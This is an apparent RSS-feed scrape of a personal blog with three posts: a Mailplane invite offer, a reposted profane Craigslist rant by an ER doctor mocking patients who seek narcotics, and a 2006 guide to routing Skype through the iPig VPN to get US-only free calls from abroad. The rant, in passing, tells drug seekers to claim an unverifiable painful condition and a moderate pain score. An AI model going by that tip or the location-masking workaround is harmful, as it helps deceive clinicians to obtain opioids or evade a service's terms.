So if you think Mailplane is right for you and you’d like to try it out, you can sign up for beta invitation here, or you can leave a comment on this thread and I can send you an invite. I have just 5 invites, so the first five requests get the invite :). Remember, it works only on Mac OS X ‘Tiger’ or later.

]]>
http://www.semanticoverload.com/2007/08/24/mailplane-reviewed/feed/ 3
From best of craigslist — Advice from ER doc. to drug seekers http://www.semanticoverload.com/2007/08/15/from-best-of-craigslist-advice-from-er-doc-to-drug-seekers/ http://www.semanticoverload.com/2007/08/15/from-best-of-craigslist-advice-from-er-doc-to-drug-seekers/#comments Wed, 15 Aug 2007 20:49:16 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=108 Originally from Best of Craigslist

Source: http://www.craigslist.org/about/best/sfo/301345524.html

I simply had to share this. This is worth a thousand laughs!!

Advice from an ER doctor to drug seekers


Date: 2007-03-27, 9:56AM PDTOK, I am not going to lecture you about the dangers of narcotic pain medicines. We both know how addictive they are: you because you know how it feels when you don’t have your vicodin, me because I’ve seen many many many people just like you. However, there are a few things I can tell you that would make us both much happier. By following a few simple rules our little clinical transaction can go more smoothly and we’ll both be happier because you get out of the ER quicker.The first rule is be nice to the nurses. They are underpaid, overworked, and have a lot more influence over your stay in the ER than you think. When you are tempted to treat them like shit because they are not the ones who write the rx, remember: I might write for you to get a shot of 2mg of dilaudid, but your behavior toward the nurses determines what percent of that dilaudid is squirted onto the floor before you get your shot.The second rule is pick a simple, non-dangerous, (non-verifiable) painful condition which doesn’t require me to do a four thousand dollar work-up in order to get you out of the ER. If you tell me that you headache started suddenly and is the ‘worst headache of your life’ you will either end up with a spinal tap or signing out against medical advice without an rx for pain medicine. The parts of the story that you think make you sound pitiful and worthy of extra narcotics make me worry that you have a bleeding aneurysm. And while I am 99% sure its not, I’m not willing to lay my license and my families future on the line for your ass. I also don’t want to miss the poor bastard who really has a bleed, so everyone with that history gets a needle in the back. Just stick to a history of your ‘typical pain that is totally the same as I usually get’ and we will both be much happier.

The third rule (related to #2) is never rate your pain a 10/10. 10/10 means the worst pain you could possibly imagine. I’ve seen people in a 10/10 pain and you sitting there playing tetris on your cell phone are not in 10/10 pain. 10/10 pain is an open fracture dangling in the wind, a 50% body surface deep partial thickness burn, or the pain of a real cerebral aneurysm. Even when I passed a kidney stone, the worst pain I had was probably a 7. And that was when I was projectile vomiting and crying for my mother. So stick with a nice 7 or even an 8. That means to me you are hurting by you might not be lying. (See below.)

The fourth rule is never ever ever lie to me about who you are or your history. If you come to the ER and give us a fake name so we can’t get your old records I will assume you are a worse douchetard than you really are. More importantly though it will really really piss me the fuck off. Pissing off the guy who writes the rx you want does not work to your advantage.

The fifth rule is don’t assume I am an idiot. I went to medical school. That is certainly no guarantee that I am a rocket scientist I know (hell, I went to school with a few people who were a couple of french fries short of a happy meal.) However, I also got an ER residency spot which means I was in the top quarter or so of my class. This means it is a fair guess I am a reasonably smart guy. So if I read your triage note and 1) you list allergies to every non-narcotic pain medicine ever made, 2) you have a history of migraines, fibromyalgia, and lumbar disk disease, and 3) your doctor is on vacation, only has clinic on alternate Tuesdays, or is dead, I am smart enough to read that as: you are scamming for some vicodin. That in and of itself won’t necessarily mean you don’t get any pain medicine. Hell, the fucktards who list and allergy to tylenol but who can take vicodin (which contains tylenol) are at least good for a few laughs at the nurses station. However, if you give that history everyone in the ER from me to the guy who mops the floor will know you are a lying douchetard who is scamming for vicodin. (See rule # 4 about lying.)

The sixth and final rule is wait your fucking turn. If the nurse triages you to the waiting room but brings patients who arrived after you back to be treated first, that is because this is an EMERGENCY room and they are sicker than you are. You getting a fix of vicodin is not more important than the 6 year old with a severe asthma attack. Telling the nurse at triage that now your migraine is giving you chest pain since you have been sitting a half hour in the waiting area to try to force her into taking you back sooner is a recipe for making all of us hate you. Even if you end up coming back immediately, I will make it my mission that night to torment you. You will not get the pain medicine you want under any circumstances. And I firmly believe that if you manipulate your way to the back and make a 19 year old young woman with an ectopic pregnancy that might kill her in a few hours wait even a moment longer to be seen, I should be able to piss in a glass and make you drink it before you leave the ER.

So if you keep these few simple rules in mind, our interaction will go much more smoothly. I don’t really give a shit if I give 20 vicodins to a drug-seeker. Before I was burnt out in the ER I was a hippy and I would honestly rather give that to ten of you guys than make one person in real pain (unrelated to withdrawal) suffer. However, if you insist on waving a flourescent orange flag that says ‘I am a drug seeker’ and pissing me and the nurses off with your behavior, I am less likely to give you that rx. You don’t want that. I don’t want that. So lets keep this simple, easy, and we’ll all be much happier.

Sincerely,
Your friendly neighborhood ER doctor

]]>
http://www.semanticoverload.com/2007/08/15/from-best-of-craigslist-advice-from-er-doc-to-drug-seekers/feed/ 0
Call any phone in the US for free!! http://www.semanticoverload.com/2006/06/22/call-to-any-phone-in-us-for-free/ http://www.semanticoverload.com/2006/06/22/call-to-any-phone-in-us-for-free/#comments Thu, 22 Jun 2006 19:43:50 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=101 After considerable research, experimenting and testing I have finally come up with a way for people worldwide to call any phone in US for free. This has been tested from India and it works. I dont see any reason why it shouldnt work from other countries.

Minimum requirements:

  1. High speed internet connection (DSL, Cable internet). I have not tested it with dial-up, and so cannot vouch for this working with dial-up.
  2. A computer running XP with multimedia support and admin priviliges
  3. Computer speakers and microphone
  4. The tutorial below
  5. 20 minutes of your time

Here’s a brief summary of how this works. Skype is offering free calls to all landlines and mobile phones within US and Canada till end of 2006. However, if you connect to skype from outside US and Canada, Skype will detect that the connection is not within US and so wont allow you to call for free. The workaround is to make Skype believe that you are connecting to it from the US. We use VPN to achieve that. iPig provides free VPN service that terminates in the US. So if you open a VPN connection to iPig and connect to Skype, Skype traces your origin to iPig’s servers and assumes that you are connecting from within US, allowing you to make free calls from your computer.

Here are the steps:

  1. Get a skype account and the skype instant messenger. If you dont already have one, here is how you can get it
    1. Download the latest version of Skype from www.skype.com
    2. Install it
    3. Launch the skype messenger and register a new username in the login window.
    4. Log out of skype and close the application.
  2. Get an iPig account and iPig VPN client (note that iPig will NOT work with cisco VPN client, or windows XP’s built-in VPN client). If you dont have one (which is likely the case) here is how you get one
    1. Download the the iPig client (version 1) from iPig website here. Make sure you download iPig Client v1.x and not v2.x. V2 does NOT support free accounts and will not work for you
    2. Install the iPig client. You need to reboot your PC after the installation.
    3. Reboot your PC
    4. Create a free iPig User Account
  3. Now we have all the software that we need to get this working. You need to first log into iPig and then into Skype (the order is important, it might not work otherwise)
    1. Open the iPig software and enter your iPig username and password (Screenshot)
    2. Click the “ON” button to protect all your wireless and wired communication
    3. If you have a firewall software installed (e.g. Zonealarm or Norton Internet Security), you need to allow iPig outgoing and “act as a server” Internet access if your software asks. iPig needs this in order to catch and encrypt your Internet traffic (Screenshot).
    4. Open Skype and login using your Skype username and password
    5. Call any phone number in the US using Skype, here are the instructions on how to call regular phones.
    6. Wait till the call connects and start talking :)

Hope the level of instructions are sufficient and clear enough for you to get it working. If nto just leave me a comment with a valid email address and I will respond to the comments on this blog and email you a copy as well.

Happy talkin’!!

P.S: Digg it if you like it

]]>
http://www.semanticoverload.com/2006/06/22/call-to-any-phone-in-us-for-free/feed/ 21